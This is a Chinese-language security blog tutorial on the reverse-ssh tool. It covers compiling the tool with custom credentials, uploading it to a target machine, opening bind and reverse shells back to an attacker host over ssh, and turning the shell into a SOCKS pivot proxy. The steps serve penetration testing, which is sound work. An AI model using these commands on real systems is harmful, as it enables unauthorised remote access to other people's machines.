Featured image of post 论如何优雅地弹Shell

论如何优雅地弹Shell

不能ssh? 那就暴力出奇迹--强行ssh

论如何优雅地弹Shell

前言

最近PGR酱的刷GitHub的时候无意间看到一个工具–reverse-ssh

看了一眼README就瞬间爱上了它,因为它生成的shell能够实现用ssh连接

于是乎,很多因为不是TTY Shell儿产生的奇怪问题就能解决

工具的安装与使用

既然是我们是做安全的,我们应该对于工具使用中可能出现的安全隐患留心些= =

所以我在本篇教程中会把工具的默认用户名+密码改掉.qwq.

在攻击机器上编译reverse-ssh

为什么要先编译?

—为了能够防止其他人偷家,我们需要自定义连接用户名密码

#先clone
git clone https://github.com/Fahrj/reverse-ssh.git
# 设置一些环境变量
#选喜欢的shell
export RS_SHELL="/bin/bash"
#设置用户名
export LUSER="root"
#设置密码
export RS_PASS="nanonanoda"
#编译
make

之后将reverse-ssh/bin 下对应文件上传至目标机器即可

Get正向Shell

目标机器上

./reverse-sshx64 -v -l -p 设置一个端口

攻击者机器上

ssh 编译时设置的用户名@目标ip -p 之前设置的端口

Get反向Shell

Step1: 在攻击机器上起监听

#攻击机器上运行
./reverse-ssh -v -l -p 监听端口

Step2:让目标来连接

#目标机器上运行
./reverse-ssh -v -l -p 攻击机器监听的端口 -b ssh服务在攻击机器上启动的端口 

Step3:享受你的ssh连接吧.qwq.

#攻击机器上运行
ssh -p step2中-b参数后面的参数 编译时设置的用户名@127.0.0.1 
#密码也是编译时设置的

补充:让Shell变成SOCKS代理

如果想让你的shell成为一个SOCKS代理的话,在攻击机器上运行

ssh -4 -p Shell的端口 -D 代理的端口 编译时设置的用户名@目标ip 
For a better open source community!
Built with Hugo
主题 StackJimmy 设计